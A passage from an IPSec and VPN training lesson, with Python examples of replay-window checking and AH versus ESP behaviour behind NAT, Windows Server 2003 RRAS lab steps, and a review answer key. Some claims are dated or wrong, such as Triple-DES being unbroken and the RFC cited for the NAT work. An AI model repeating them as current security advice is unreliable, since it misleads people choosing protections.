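            return "replay"            # sequence 0 is never sent by a conforming peer
        if seq > self.highest_seq:
            shift = seq - self.highest_seq
            self.bitmap = ((self.bitmap << shift) | 1) & ((1 << WINDOW_SIZE) - 1)
            self.highest_seq = seq
            return "new"
        offset = self.highest_seq - seq
        if offset >= WINDOW_SIZE:
            return "stale"
        if self.bitmap & (1 << offset):
            return "replay"
        self.bitmap |= 1 << offset
        return "new"


def parse_esp(datagram):
    """Split an ESP datagram into (SPI, sequence number, rest)."""
    if len(datagram) < 8:
        raise ValueError("ESP header truncated")
    spi, seq = struct.unpack("!II", datagram[:8])
    return spi, seq, datagram[8:]


def build_esp(spi, seq, rest):
    """Inverse of parse_esp, used to construct sample packets."""
    return struct.pack("!II", spi, seq) + rest


def process_inbound(sad, datagram):
    """Return 'accept', 'unknown-sa', 'replay' or 'stale' for one ESP datagram."""
    spi, seq, _ = parse_esp(datagram)
    sa = sad.get(spi)
    if sa is None:
        return "unknown-sa"            # no SA negotiated for this SPI: drop
    verdict = sa.check_and_update(seq)
    return "accept" if verdict == "new" else verdict


def run_demo():
    # Constructed SA database (SAD): two inbound SAs, keyed by SPI.
    sad = {
        0x1000: SecurityAssociation(0x1000, "HMAC-SHA1-96 / DES-CBC"),
        0x2000: SecurityAssociation(0x2000, "HMAC-MD5-96 / DES-CBC"),
    }
    arrivals = [
        (0x1000, 1),      # first packet on the SA
        (0x1000, 2),      # next in order
        (0x1000, 2),      # the same packet again: a replay
        (0x1000, 5),      # reordered ahead; the window slides forward
        (0x1000, 3),      # late but still inside the window: accepted once
        (0x2000, 1),      # a different SA keeps its own window
        (0x3000, 1),      # no SA for this SPI
        (0x1000, 300),    # large jump: everything older than 237 is now stale
        (0x1000, 100),    # far behind the window: rejected
    ]
    return [process_inbound(sad, build_esp(spi, seq, b"ciphertext"))
            for spi, seq in arrivals]


if __name__ == "__main__":
    for verdict in run_demo():
        print(verdict)
```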
For a successful deployment of IPSec, a scalable, automated SA and key management scheme is necessary. Several protocols have been defined for these functions:
• The Internet Security Association and Key Management Protocol (ISAKMP) defines procedures and packet formats to establish, negotiate, modify, and delete SAs. It also provides the framework for exchanging information about authentication and key management, but it is completely separate from key exchange.
• The Oakley Key Determination Protocol (Oakley) describes a scheme by which two authenticated parties can exchange key information. Oakley uses the Diffie-Hellman key exchange algorithm.
• The Internet Key Exchange (IKE) algorithm is the default automated key management protocol for IPSec, which is the result of combining both the ISAKMP and Oakley protocols.
Key exchange is closely related to the management of SAs. When you need to create an SA, you need to exchange keys, and IKE is the framework that wraps together all the required pieces and delivers them as an integrated package.
IPSec Components
The key IPSec components are described in the following table.

Component                                     Use
IPSec driver                                  Monitors, filters, and secures IP traffic.
ISAKMP/Oakley (Internet Security Association  Key exchange and management services to oversee security negotiations between hosts.
  Key Management Protocol)
IP Policy Agent                               Looks for appropriate policies and delivers these policies to the IPSec driver and ISAKMP.
IP Security Policy and Security Association   Defines the security environment in which the two hosts must communicate.
Security Association API                      Provides the programming interface that will be used between the IPSec driver, ISAKMP, and the Policy Agent.
Management Tools                              Creates policies, tracks IP security statistics, and creates and logs appropriate IP security events.

Lesson 6: Implementing IPSec and VPNs 345
IPSec Tunnel and Transport Modes
In IPSec Tunnel Mode, one packet is encapsulated or tunneled in another packet, while IPSec Transport Mode secures the packet exchange end-to-end, source to destination. IPSec Tunnel Mode is used primarily for link-to-link packet exchanges between intermediary devices, like routers and gateways, while Transport Mode provides the security service between the two communicating endpoints.
Either mode can use ESP or AH packet types. Both modes require that the two clients engage in a complex negotiation involving the IKE protocol and PKI certificates for mutual authentication.
In Transport Mode, both of the end systems must support IPSec, but the intermediate systems do not have to support IPSec because they simply forward packets.
Tunnel Mode is intended for gateway-to-gateway links. In Tunnel Mode, the sender encapsulates the entire IP datagram by creating a completely new header. The ESP protocol encrypts the entire datagram, including the original IP header, and the AH protocol generates a signature for the entire packet, including both the original IP header and the new one. Therefore, the encapsulation and encryption processes create a secure tunnel through an inherently insecure network. In Tunnel Mode, only the gateways providing the security services must support IPSec. The end systems (ultimate source and ultimate destination systems) do not have to support IPSec.
IPSec and Network Address Translation (NAT)
Network Address Translation (NAT) is not compatible with the Authentication Header (AH) protocol, whether used in Transport or Tunnel Mode. An IPSec VPN using the AH protocol digitally signs the outbound packet, which includes both data payload and headers, by appending a hash value to the packet. When using the AH protocol, the data payload within the packet is not encrypted.
The compatibility problem stems from the fact that a NAT device in between the IPSec endpoints will rewrite either the source or destination address with one of its own choosing. The VPN device at the receiving end will verify the integrity of the incoming packet by computing its own hash value, and will complain that the hash value appended to the received packet doesn't match. The VPN device at the receiving end doesn't know about the NAT in the middle, so it assumes that the data has been altered while in transit.
IPSec, using ESP in Tunnel Mode, encapsulates the entire original packet (including headers) in a new IP packet. The new IP packet's source address is the outbound address of the sending VPN gateway, and its destination address is the inbound address of the VPN device at the receiving end. When using the ESP protocol with authentication, the packet contents (in this case, the entire original packet) are encrypted. The encrypted contents, but not the new headers, are signed with a hash value appended to the packet.
This mode (Tunnel Mode ESP with authentication) is compatible with NAT, because integrity checks are performed over the combination of the original header plus the original payload, which is unchanged by a NAT device. Transport Mode ESP with authentication is also compatible with NAT, but it is not often used by itself. Since the hash is computed only over the original payload, the original headers can be rewritten.
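The NAT interaction just described, worked through as an added example that is not part of the course text: the same HMAC-SHA1-96 integrity check is applied to an AH packet and to a Tunnel Mode ESP packet, before and after a NAT device rewrites the outer source address. The simplified header layout, the shared key and the addresses are assumptions made here, and payload encryption is left out because only what the hash covers matters for the NAT question.

```python
"""Added example (not from the course text): why AH fails behind NAT while Tunnel
Mode ESP with authentication survives it.  The Integrity Check Value is
HMAC-SHA1 truncated to 96 bits (HMAC-SHA1-96, the form IPsec uses); the IP
header layout, the shared key and all addresses are simplified and constructed
here.  Encryption of the ESP payload (DES-CBC in the course text) is omitted
because only integrity coverage matters for the NAT question.
"""
import hashlib
import hmac
import ipaddress
import struct

SHARED_KEY = b"constructed shared secret (would come from IKE)"
ICV_LEN = 12            # HMAC-SHA1-96: 96 bits = 12 bytes
HDR_LEN = 9             # simplified IP header: src(4) + dst(4) + protocol(1)
AH_PROTO, ESP_PROTO = 51, 50


def icv(key, data):
    """Integrity Check Value: HMAC-SHA1 truncated to 96 bits."""
    return hmac.new(key, data, hashlib.sha1).digest()[:ICV_LEN]


def ip_header(src, dst, protocol):
    """Simplified IPv4 header carrying only the fields that matter here."""
    return (ipaddress.ip_address(src).packed
            + ipaddress.ip_address(dst).packed
            + struct.pack("!B", protocol))


def ah_packet(src, dst, payload, key):
    """AH: the ICV covers the IP header (addresses included) and the payload.

    Real AH zeroes mutable fields such as TTL and checksum before hashing,
    but the addresses are immutable and are always covered.
    """
    hdr = ip_header(src, dst, AH_PROTO)
    return hdr + icv(key, hdr + payload) + payload


def ah_verify(packet, key):
    hdr = packet[:HDR_LEN]
    tag = packet[HDR_LEN:HDR_LEN + ICV_LEN]
    payload = packet[HDR_LEN + ICV_LEN:]
    return hmac.compare_digest(tag, icv(key, hdr + payload))


def esp_tunnel_packet(gw_src, gw_dst, inner_packet, spi, seq, key):
    """Tunnel Mode ESP: a new outer header carries the whole original packet.

    The ICV covers the ESP header (SPI, sequence number) and the encapsulated
    original packet, but not the outer IP header.
    """
    outer = ip_header(gw_src, gw_dst, ESP_PROTO)
    body = struct.pack("!II", spi, seq) + inner_packet
    return outer + body + icv(key, body)


def esp_verify(packet, key):
    body, tag = packet[HDR_LEN:-ICV_LEN], packet[-ICV_LEN:]
    return hmac.compare_digest(tag, icv(key, body))


def nat_rewrite_source(packet, new_src):
    """What a NAT device in the path does: replace the outer source address."""
    return ipaddress.ip_address(new_src).packed + packet[4:]


def run_demo():
    """Verify each packet as the receiving VPN device would, with and without NAT."""
    payload = b"GET / HTTP/1.0\r\n"
    inner = ip_header("192.168.1.10", "10.0.0.5", 6) + payload   # original packet
    ah = ah_packet("192.168.1.10", "10.0.0.5", payload, SHARED_KEY)
    esp = esp_tunnel_packet("192.168.1.1", "203.0.113.9", inner, 0x1000, 1, SHARED_KEY)
    natted = "198.51.100.7"    # address the NAT device substitutes
    return {
        "ah_direct": ah_verify(ah, SHARED_KEY),
        "ah_via_nat": ah_verify(nat_rewrite_source(ah, natted), SHARED_KEY),
        "esp_tunnel_direct": esp_verify(esp, SHARED_KEY),
        "esp_tunnel_via_nat": esp_verify(nat_rewrite_source(esp, natted), SHARED_KEY),
    }


if __name__ == "__main__":
    for name, ok in run_demo().items():
        print(f"{name}: {'integrity check passed' if ok else 'integrity check FAILED'}")
```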
TASK 6F-1
Assigning Tunneling Protocols
1. In the table provided here, assign the tunneling protocols IPSec, PPTP, L2TP, SSH and Socks v5 to their corresponding OSI layers.

Layer Number   Name           Protocols
7              Application    SSH, Socks v5
6              Presentation
5              Session
4              Transport
3              Network        IPSec
2              Data Link      PPTP, L2TP
1              Physical
Topic 6G
VPN Design and Architecture
VPN configuration is often complex. Conflicts between NAT and IPSec can cause legitimate packets to be refused or dropped. Further, strong authentication of a VPN client is critical. If the client is not strongly authenticated, the enterprise is at risk of an intruder remotely taking control of the client system and gaining an open tunnel into the enterprise network.
One VPN design choice would be to require a personal firewall with built-in intrusion detection on the remote client. The personal firewall would block any inbound communication, and when intrusions are detected, it would report back to the logging server on the enterprise network.
The problem with this design is guaranteeing that the personal firewall software is always present or functional on the client side. Further, how does the enterprise network force a disconnect of the tunnel session? How does it deactivate the user's account?
Designing an IPSec-based VPN solution involves addressing the following objectives:
• Designing an IPSec encryption scheme.
• Designing an IPSec management strategy.
• Designing negotiation policies.
• Designing security policies.
• Designing IP filters.
• Defining security levels.
VPN Implementation Challenges
Most organizations experience challenges with rolling out and deploying a VPN. In this section, you will examine some key VPN challenges and provide guidelines to minimize implementation-related problems and issues.
Typical challenges experienced with VPN deployment include:
• Difficulty with centralized management of client policy, configuration, and strong authentication requirements.
• Lack of protocol interoperability (for example, interoperability between NAT, IPSec, and PPTP).
• Complexity of infrastructure.
Specific challenges that an organization may experience in the process of deploying a VPN include:
• Addressing and routing.
• Administration.
Common addressing methods for VPNs include DHCP and NAT address pools. The problem is that NAT and IPSec have had compatibility problems. Some vendors, such as Cisco, are solving the problem by licensing an IPSec-over-UDP client that allows IPSec connections through NAT. The IETF is working to introduce new standards for IPSec and NAT to work together better. According to RFC 2026, established SAs would no longer be bound to IP addresses. Instead, SAs would be controlled via Host Identity Tags (HIT) and Scope Identity fields. Therefore, a VPN client system could conceivably change its IP address using Mobile IP, DHCP, PPP, or even IPv6, and still maintain the same SA with its communication partner.
security level: The combination of a hierarchical classification and a set of non-hierarchical categories that represents the sensitivity of information.
Also, a draft protocol called the Host Identity Protocol (HIP) would be integrated into existing IKE code, allowing IKE to work across NAT devices as well. The IETF is also working on long-term solutions to make NAT and IPSec work together better. Until new standards are established, the most popular way to overcome problems with IPSec Tunnel Mode with NAT is to use ESP Transport Mode. This allows the VPN to traverse a NAT device, such as a gateway. However, client authentication cannot be guaranteed because IP headers are not verified upon receipt. The inability to authenticate communication partners in a VPN tunnel compromises the purpose of IPSec.
The challenge for administration is to make sure that remote VPN clients have installed and configured their VPN software correctly. Also, they need to have security mechanisms in place to make sure that the client host is secure against attacks that might use the VPN connection to access the corporate network.
Other VPN challenges include:
• Authentication and key management
• Fault tolerance
• Performance
• Reliable transport
• VPN architecture
TASK 6G-1
Examining VPN-related RFCs
1. Navigate to C:\Tools\Lesson6\RFCs, then open rfc-index.wri.
2. Perform a search using the keyword VPN.
You should see RFC 2547 highlighted. RFC 2547 describes a method by which an Internet Service Provider may provide VPNs for its customers.
3. Identify the method used, and then close the file.
4. In C:\Tools\Lesson6\RFCs, scroll down to rfc2547.txt.
5. Scroll down to the third paragraph in section 1.1, and read the definitions for intranet and extranet. Note if these compare to your understanding of these terms.
6. Close all open windows.
Topic 6H
VPN Security
A VPN is not necessarily secure. This is because a VPN is typically protected by nothing more than a weak password. Sending information over the Internet is not secure, and therefore has the corporate world concerned, even with the advent of VPNs. In practical terms, information passing over a secure VPN will potentially be routed across several networks that are not under the control of the sender. An important part of any VPN is the encryption that will secure the data payload from unauthorized users.
Although most of the VPN solutions delivered today use Triple-DES encryption, there is a widely used, older, weaker type of encryption called DES, or Single-DES. Triple-DES, which is the type of encryption normally implemented in today's solutions, is much more secure than Single-DES, and has never been broken. That's how safe data passing through a secure VPN is.
Virtually all of the common encryption technologies can be used in a VPN. Most
VPN equipment vendors give the user a choice. IT managers can often select
anything from the 40-bit built-in encryption offered by Microsoft under Windows
95 to more robust encryption technologies like Triple-DES.
VPN vendors support a number of different authentication methods. Many ven-
dors now support a wide range of authentication techniques and products,
including such things as Kerberos, tokens, and software- and hardware-based
dynamic passwords.
The primary purpose of a VPN is to secure the data in transmission. Four critical functions must be in place to ensure this.
• Data encryption, which ensures that no one who intercepts data as it travels through the Internet can read it. Most solutions delivered today use Triple-DES encryption, which is so strong that it has never been broken.
• Data integrity, which checks each data packet received from the Internet to make sure that it has not been modified during transit.
• User authentication, which ensures that only authorized people can gain access to corporate resources through a VPN. There are many different methods in which users can authenticate themselves, from very basic user name and password authentication to much more secure methods, such as digital certificates, smart cards, SecureID tokens, biometrics, and others.
• Access control, which restricts unauthorized access to the network.
A VPN must secure the data against eavesdropping and tampering by unauthorized parties. Depending on the VPN solution being implemented, there are a few ways to control the type of traffic sent over a VPN session. Many VPN devices allow you to define a user- or group-based filter, which can control IP address and protocol/port services allowed through a tunnel. In addition, IPSec-based VPNs allow you to define a list of networks to which traffic can be passed (Security Associations). The first mechanism allows the administrator to limit access to specific networks/machines and applications on their network. The second usually provides full connectivity to the private network. Allowing VPN access only in conjunction with strong authentication also prevents an intruder from successfully authenticating to your network, even if they somehow configured/captured a VPN session.
VPNs and Firewalls
Two of the most common configurations for a VPN device providing corporate remote access are to run a VPN device either in parallel to an existing firewall or behind an existing firewall. Terminating VPN sessions in front of a firewall or on a firewall itself is not as popular. There are pros and cons for all implementations.
• Placing a VPN device in parallel to an existing firewall requires no changes to an existing firewall infrastructure, but it also means that you will have two entry points into your private network. On most VPN devices, you should verify that they block all non-VPN traffic to minimize the additional security risk. Depending on how your network is set up, this will probably also require the VPN device to do some sort of address translation, or to have the ability to redirect this traffic to an existing firewall.
• Placing a VPN device behind an existing firewall forces you to make changes to the configuration of your firewall. You will also need a firewall smart enough to be able to configure a filter to pass the VPN traffic. Depending on how your network is set up, this may also allow you to make use of only one of the two or more Ethernet ports on your VPN device. This configuration is sometimes known as one-arm routing.
• Placing a VPN device in front of your firewall terminates secure traffic in a public zone. You will need to assign addresses to users from a certain block of IP addresses and open a large hole in the firewall for access from these IP addresses. A potential advantage to doing this would be that you could then use your existing firewall to control the destination of traffic, but most VPN boxes will also allow you to do this. This type of application may make more sense for trading-partner connectivity, as opposed to connectivity for remote access users.
• Implementing a VPN on an existing firewall adds some intense processing to a device whose original purpose was, simply speaking, to control network access. Some people like the simplicity of adding a service to an existing device on the network perimeter.
The use of encryption adds some additional overhead to a session. Most VPN
devices, whether hardware- or software-based, will be able to process encryption
for connections up to 10Base-T speeds. On a lower-speed connection like a
modem, VPN processing is much faster than delays introduced by the limited
bandwidth availability. Often, performance is potentially affected more by packet
loss and latency on bad Internet connections than by the encryption overhead.
A VPN client typically establishes a connection with a VPN server using either L2TP over IPSec or PPTP. Keep in mind the following information related to PPTP, as it may be required for defining packet filters for VPN traffic on firewall systems:
• TCP port 1723 allows PPTP tunnel maintenance traffic to move from the PPTP client to the PPTP server.
• IP protocol type 47 allows the PPTP tunneled data to move from the PPTP client to the PPTP server.
The following information may be required for defining packet filters for L2TP over IPSec VPN traffic on firewall systems:
• UDP port 500 allows the Internet Key Exchange (IKE) traffic to access the VPN server.
• UDP port 1701 allows L2TP traffic to move from the VPN client to the VPN server.
• IP protocol ID 50 allows IPSec ESP traffic to move from the VPN server to the VPN client.
At the firewall, typically all L2TP traffic, including tunnel maintenance and tunneled data, is encrypted as an IPSec ESP payload. Figure 6-11 depicts ports and protocols associated with tunneling protocols.
Figure 6-11: Ports and protocols associated with tunneling protocols.
VPN Authentication
In general, user authentication is based on the following principle: An entity has authenticating knowledge (what you know), possession of an authenticating device (what you have), or exhibits a required physiological characteristic (what you are). Strong authentication requires that at least two of the three factors be demonstrated.
VPN authentication protocols, which operate at the Data Link layer, include:
• Password Authentication Protocol (PAP). PAP is a weak method for authentication as it uses a cleartext authentication scheme.
• Challenge Handshake Authentication Protocol (CHAP). CHAP does not transmit the actual password and is a stronger authentication protocol than PAP. With CHAP, remote customers use a Message Digest 5 (MD5) hash of their credentials in response to a challenge by a network access server.
• Shiva Password Authentication Protocol (SPAP). SPAP is used in mixed environments that support the Shiva Local Area Network Rover software.
• Extensible Authentication Protocol-Transaction Level Security (EAP-TLS). EAP-TLS is a Microsoft implementation of a strong authentication method that uses public key certificates.
The IPSec authentication scheme for both AH and ESP uses the Hash-based Message Authentication Code (HMAC) authentication code, which uses a shared secret key between two parties, rather than public key methods, for message authentication. The generic HMAC procedure can be used with just about any hash algorithm, although IPSec specifies support for at least MD5 and Secure Hash Algorithm 1 (SHA-1) because of their widespread use. In HMAC, both parties share a secret key. The secret key is employed with the hash algorithm in a way that provides mutual authentication, but at the same time prevents the key from being transmitted on the line. IPSec key management procedures are used to manage key exchanges between the two parties via Security Associations (SA).
Key Length
Data is transmitted securely in a VPN by using industry standard IPSec tunneling, encryption services using DES and 3DES, and MD5 and SHA-1 for message authentication. IPSec creates private end-to-end pipes, or tunnels, through the IP network, connecting the designated VPN sites to each other. Unauthorized access to the information is prevented by the encryption and authentication services, which are applied.
Encryption systems depend on two mechanisms to guarantee data confidentiality. The encryption algorithm provides the mathematical rules that convert the plaintext message to a random ciphertext message. The algorithm provides steps for converting the plaintext message with an encryption key, a block of alphanumeric data that introduces the random element into the ciphertext message. The longer the secret key is, the more time it takes for an attacker to test all possible values of the key and determine the plaintext content of the message. In other words, data that will be of value to an attacker for a long time should be encrypted with longer keys.
TASK 6H-1
Viewing Firewall-related RFCs
1. Navigate to C:\Tools\Lesson6\RFCs and open rfc-index.wri.
2. Perform a search using the keyword firewall.
If you keep clicking Find Next, you will see many hits. Stop when you see RFC 2979 highlighted. RFC 2979 describes the behavior of and requirements for Internet firewalls.
3. Close the file.
4. Navigate to C:\Tools\Lesson6\RFCs and open rfc2979.txt in Notepad.
5. Scroll down to the second paragraph in section 3.1.1, and read the transparency rule for firewalls.
6. Close all open windows.
Topic 6I
Configuring a VPN
Built into Windows 2003's Routing And Remote Access Service (RRAS) is a single, integrated service that terminates connections from either dial-up or Virtual Private Network (VPN) clients. With RRAS, your Windows 2003 Server can function as a remote access server, a VPN server, a gateway, or a branch-office router. You can allow users ready access to the network through the Internet by implementing a VPN, therefore greatly reducing direct dial-up costs. Windows 2003 VPNs can be created by using either PPTP or L2TP.
In this topic, you will build a VPN, and the tasks will require three computers. One computer will be configured as the internal resource, a simple FTP site. The second computer will be the VPN Server, and this machine will require two network cards. One of the cards on this server will be the connection to the private network, and the other will be the connection to the remote client. The third computer will function as the network client, the one making the access via the VPN. The computers will be called: VPN Server, Internal Server, and VPN Client.
About the Tasks
In this task, you will work in pairs, with one student configuring the VPN Server and the other configuring the VPN Client. The Internal Server is a simple web page, or ftp site, hosted on the instructor computer, as part of the internal network.
TASK 6I-1
Configuring the VPN Server
Note: Complete this task only if you are designated as the VPN Server.
Note: The VPN Server in these tasks requires a second network card. This can be an integrated or non-integrated network card. Upon completion of the VPN tasks, this second network card can be either removed or disabled for the remainder of the class.
1. Enable the second network card on the server.
2. Assign the second network card with the following IP Address information:
IP 10.0.10.x (replace x with your seat number)
SM 255.255.255.0
DG This can be left blank
3. Open a command prompt and verify your NIC and IP Address configuration by entering the command ipconfig /all
4. Verify that you have one NIC with an address of 172.16.x.x or 172.18.x.x based on your location in the classroom. Your second NIC has an address of 10.0.10.x based on your location in the classroom.
5. Write down your 172.16.x.x address as your Internal NIC and your 10.0.10.x address as your External NIC.
6. Choose Start→Administrative Tools→Configure Your Server Wizard. At the Welcome screen, click Next.
7. Verify you have met the requirements at the Preliminary Steps screen, and click Next. The system will now detect your network settings and configuration.
8. Select the Custom Configuration radio button, and click Next.
9. Select the Remote Access / VPN Server, and click Next.
10. In the Summary Of Selections, verify that you are going to run the Routing and Remote Access Server to set up routing and VPN, then click Next. The RRAS Wizard will open at this time.
11. At the RRAS Setup Wizard, click Next.
12. Select the Virtual Private Network (VPN) Access and NAT radio button, and click Next.
13. Select your VPN Network adapter. In this task, this is the NIC that you have assigned the 10.0.10.x IP address to.
14. Leave the Basic Firewall check box checked, and click Next.
15. Select your internal network for the clients to connect to, and click Next.
16. In the IP Address Assignment screen, select the From A Specified Range Of Addresses radio button and click Next.
17. In the Address Range Assignment screen, click the New button.
18. These are the IP Addresses of the internal network. Enter a small range, based on your seating in the classroom, click OK, verify your addresses are correct, and click Next.
19. At the Network Selection window, select the network that has access to the Internet, and click Next. This is usually the same network as your internal resource network.
20. At the Name & Address Translation Services window, leave the default of basic name and address services, and click Next. If your system does not show this window, continue to the next step.
21. Review the Address Assignment Range, and click Next. If your system does not show this window, continue to the next step.
22. For this lesson, you will authenticate locally, so leave the No, Use RRAS To Authenticate Connection Requests radio button selected, and click Next.
23. Review your settings, and click Finish. (If you get a prompt to configure relaying of DHCP messages, click OK.)
24. The Remote Access / VPN Server will now start. Click Finish.
25. Close the Manage Your Server window.
VPN Clients
Generally, the configuration on the client side of the VPN is minimal. The client needs to know how to make the connection, and needs proper credentials to authenticate and use the VPN. In the following task, you will prepare the VPN Server to accept VPN clients.
TASK 6I-2
Configuring VPN Clients
Setup: Complete this task if you are designated as the VPN Server.
1. Choose Start→Administrative Tools→Computer Management.
2. Expand Local Users And Groups (under System Tools).
3. Right-click Users and choose New User.
4. In the User Name text box, type VPN1 and enter and confirm a password of QWERTY1. Uncheck the box to change password at next logon, and click Create.
5. Click Close. One client account is enough for testing purposes.
6. Double-click the new VPN1 user account, and click the Dial-in tab.
7. Select the Allow Access radio button and click OK.
8. Close the Computer Management window.
9. Choose Start→Administrative Tools→Routing And Remote Access.
10. Expand your server_name and click Remote Access Policies.
11. Right-click Remote Access Policies, and choose New Remote Access Policy.
12. In the New Remote Access Policy Wizard, click Next.
13. Leave the Use The Wizard To Set Up A Typical Policy For A Common Scenario radio button selected.
14. In the Policy Name text box, type VPN_Policy_1 and click Next.
15. In the Access Method window, select the VPN radio button and click Next.
16. In the User Or Group Access window, select the User radio button and click Next.
17. For the Authentication Method, ensure that only MS-CHAPv2 is checked, and click Next.
18. For the Policy Encryption Level, only check the box for Strongest Encryption (MPPE 128-bit) and click Next.
19. Review the settings for this policy, and click Finish.
Establishing the VPN
The following task will require steps on both the VPN Server and on the VPN
Client computers. The VPN Client will connect to the VPN Server, receive an IP
Address and join the private network. The VPN Server will verify the connection
is active, and the VPN Client will then access a resource located on the Internal
Server.
In addition to the VPN Client and the VPN Server, to show the VPN to a higher
level, if there is enough time in the class, create a resource server for the VPN
client to connect to. In the following task, the FTP Server is designed to be run-
ning on the instructor machine, in the middle segment.
TASK 6I-3
Establish the VPN
Note: Perform step 1 through step 15 on the VPN Client.
1. Open the TCP/IP Properties of your network card. Edit the IP Address to be a node on the 10.0.10.X/24 network. You can replace the X with your seat number.
2. Close the properties of your network card.
3. Open a command prompt.
4. Enter ipconfig to verify your IP Address configuration.
5. Choose Start→Control Panel→Network Connections→New Connection Wizard.
6. In the New Connection Wizard, click Next.
7. Select the Connect To The Network At My Workplace radio button and click Next.
8. Select the Virtual Private Network Connection radio button and click Next.
Instructor note: The Instructor machine requires a resource for the VPN client to connect into. Enable the FTP Service on your machine, and use that for your students. If your class has enough time, run a packet capture on each machine to perform a packet analysis of the connection and ftp site access.
9. In the Company Name text box, type SCP VPN and click Next.
10. Enter the IP Address that is assigned to the External NIC of the VPN Server, and then click Next.
Note: The external IP Address is the one in the 10.0.10.x range.
11. Select the My Use Only radio button and click Next.
12. To complete the creation of the new connection, click Finish.
13. In the screen to connect to the SCP VPN, in the User Name field, type VPN1, in the Password field, type QWERTY1, and then click Connect.
14. Open a command prompt, and enter ipconfig /all
15. Note that you have been assigned an IP Address from the VPN Server, and that the IP Address is part of the Internal network.
Note: Perform step 16 through step 19 on the VPN Server.
16. Choose Start→Administrative Tools→Routing And Remote Access.
17. Expand your Server name.
18. Click Remote Access Clients.
19. In the right pane, double-click the connection to see the IP Address that was assigned, and other statistics.
Note: Perform step 20 through step 24 on the VPN Client.
20. In the command prompt, enter ftp 172.17.10.1
(If your instructor changed the IP Address of the Internal Server, use the address as provided.)
21. Enter anonymous as the username with no password.
22. Once connected, enter dir to list the contents of the ftp site.
23. When done browsing the ftp site, enter bye to end the session.
24. Close all windows.
Returning the Classroom Setup to its Original State
To ensure the remaining tasks in this course work properly, the VPN implementa-
tion lab must be torn down, and the classroom environment returned to its
original state. Be sure not to skip this quick section.
TASK 6I-4
Restoring the Classroom Setup
1. On the VPN Server, choose StartAdministrative ToolsCongure Your
Server Wizard.
2. In the Welcome Screen, click Next.
3. In the Preliminary Steps Wizard, click Next.
4. Click Remote Access / VPN Server, and click Next.
5. Check the Remove The Remote Access/VPN Server Role check box and
click Next.
6. At the prompt that you are disabling the router, click Yes.
7. When the VPN Server Role has been removed, click Finish.
8. Disable the External NIC on the VPN Server.
9. Open a command prompt, and ensure that you are only running the
Internal NIC with the 172.x.x.x address by entering ipconfig
10. On the VPN Client, choose Start → Connect To → Show All Connections.
11. Right-click the SCP VPN connection, and choose Delete.
12. In the confirmation prompt, click Yes.
13. Open the properties of your NIC and return the IP Address to your
original configuration, then click OK. (The 172.x.x.x address.)
14. Close all windows.
Summary
In this lesson, you worked with a Microsoft Management Console (MMC).
You configured an MMC and viewed the default or built-in IPSec policies.
You then created custom IPSec policies. You implemented and tested these
policies. You also took a first look at implementing filter lists and
experimented with a couple of authentication methods: preshared keys and
certificates.
Lesson Review
6A What are the two protocols in IPSec that are used to protect network
traffic?
The Encapsulating Security Protocol (ESP) and the Authentication Header
(AH).
What are the two main modes of implementation for IPSec?
Transport Mode and Tunnel Mode.
If you are going to set up a VPN with IPSec, what mode will you probably
use?
Tunnel Mode.
6B What are the three default IPSec policies in Windows 2003?
Server (Require Security), Server (Request Security), and Client (Respond
Only).
What integrity algorithms are supported in Windows 2003 IPSec?
MD5 and SHA-1.
What encryption algorithms are supported in Windows 2003 IPSec?
DES and 3DES.
6C What authentication methods are supported in Windows 2003 implementation
of IPSec?
Kerberos, Certificates, and Preshared Keys.
What are the default key lifetimes?
A new key is generated for every 100 MB of data exchanged between the
two IPSec devices or every 15 minutes, whichever is earlier.
6D When would ESP's integrity check be most usefully employed?
When implementing IPSec in Tunnel Mode. ESP's integrity check at the tunnel
endpoint will ensure the integrity of the payload (including the
encapsulated packet, internal IP headers, and all other data).
Using filters, it is possible to explicitly control IPSec traffic.
6E Describe all of the key components of a VPN.
VPN server, VPN client, tunnel, VPN connection, tunneling protocols, tunneled
data, and transit network.
Identify the key VPN tunneling protocols.
PPTP, L2TP, and IPSec.
6F What are the differences between the tunneling protocols PPTP and
L2TP?
PPTP uses separate channels: a control stream that runs over TCP, and a
data stream that runs over GRE. L2TP uses UDP. PPTP is generally associated
with Microsoft, and Microsoft uses MPPE for encryption. L2TP uses
IPSec for encryption.
What are the differences between IPSec Tunnel and Transport Modes?
In IPSec Tunnel Mode, one packet is encapsulated or tunneled in another;
while IPSec Transport Mode secures the packet exchange end-to-end, source
to destination. IPSec Tunnel Mode is used primarily for link-to-link packet
exchanges between intermediary devices like routers and gateways. Transport
Mode provides the security service between the two communicating
endpoints.
What is a Security Association (SA)?
A Security Association (such as ISAKMP) determines which algorithms will
be used for the session, how the key exchange will take place, and how often
keys will need to change.
What are the two types of SAs?
Transport Mode SA and Tunnel Mode SA.
How does IKE relate to ISAKMP and Oakley?
ISAKMP defines procedures and packet formats to establish, negotiate,
modify, and delete SAs. It also provides the framework for exchanging
information about authentication and key management, but it is completely
separate from key exchange. Oakley describes a scheme by which two
authenticated parties can exchange key information. Oakley uses the
Diffie-Hellman key exchange algorithm. IKE is the result of combining both
ISAKMP and Oakley protocols.
6G Identify key design issues related to IPSec VPNs.
IPSec encryption scheme, IPSec management strategy, negotiation policies,
security policies, IP filters, and security levels.
Identify specific challenges associated with VPN implementation.
Difficulty with centralized management of client policy, configuration and
strong authentication requirements; lack of protocol interoperability (for
example, interoperability between NAT, IPSec, and PPTP), complexity of
infrastructure, addressing and routing, and administration.
6H What is PAP? What is CHAP? Briefly describe the differences between
them.
PAP and CHAP are both authentication protocols. PAP uses cleartext
authentication, while CHAP relies on encryption mechanisms.
Describe the security issues related to having a VPN server in front of
the firewall (exposed to the Internet connection) or having a VPN server
(in the DMZ) behind the firewall.
By placing a VPN device in front of your firewall, you will be terminating
secure traffic in a public zone. You will need to assign addresses to users
from a certain block of IP addresses and open a large hole in the firewall
for access from these IP addresses. A potential advantage to doing this
would be that you could then use your existing firewall to control the
destination of traffic, but most VPN boxes will also allow you to do this.
By placing a VPN device behind an existing firewall, you will need to
change the configuration of your firewall. You will also need a firewall smart
enough to be able to configure a filter to pass the VPN traffic. Depending on
how your network is set up, this may also allow you to make use of only one
of the two or more Ethernet ports on your VPN device.
If a VPN server is using PPTP, which ports would you need to provide
access through a firewall system?
TCP port 1723 allows PPTP tunnel maintenance traffic to move from the
PPTP client to the PPTP server.
IP protocol type 47 allows the PPTP tunneled data to move from the PPTP
client to the PPTP server.
Which ports are associated with L2TP and a VPN?
UDP port 500 allows the Internet Key Exchange (IKE) traffic to access the
VPN server.
UDP port 1701 allows L2TP traffic to move from the VPN client to the VPN
server. IP protocol ID 50 allows IPSec ESP traffic to move from the VPN
server to the VPN client.
